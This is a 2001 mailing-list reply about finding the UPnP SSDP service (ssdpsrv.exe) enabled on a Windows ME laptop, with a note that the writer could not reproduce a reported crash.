RE: Ssdpsrv.exe in WindowsME

From: Martin L. Drury Jr. (mdrury@ads-corp.com)
Date: Fri Oct 19 2001 - 05:21:58 PDT

    Last night after I got home from work, I checked my Dell Laptop (which came
    with ME preinstalled) and it too is running the ssdpsrv.  The only things
    I've installed on it since I purchased it are Office 2000, IE6, and the
    software/support drivers for my digital camera.  All of which I don't think
    would have turned it on (although I could be wrong).

    After reading up on UPnP though, I think the triggering item might be Home
    Networking, or whatever it's called in ME.  I don't personally recall
    turning it on, as my laptop automagically selected all the proper settings
    for my ISP (which was kinda nice, and scary at the same time).  The
    knowledge base article seems to suggest that UPnP is not turned on by
    default, but it's possible some OEMs might have it enabled.

    Finally, I was not able to duplicate the crash, even though I did receive
    the 400 Bad Request response.  Of course, I was busy fixing dinner at the
    time as well, so that might not mean anything ;)

    Martin L. Drury Jr.
    Advance Data Systems, Inc.
    502-228-3396 x117
    mdrury@ads-corp.com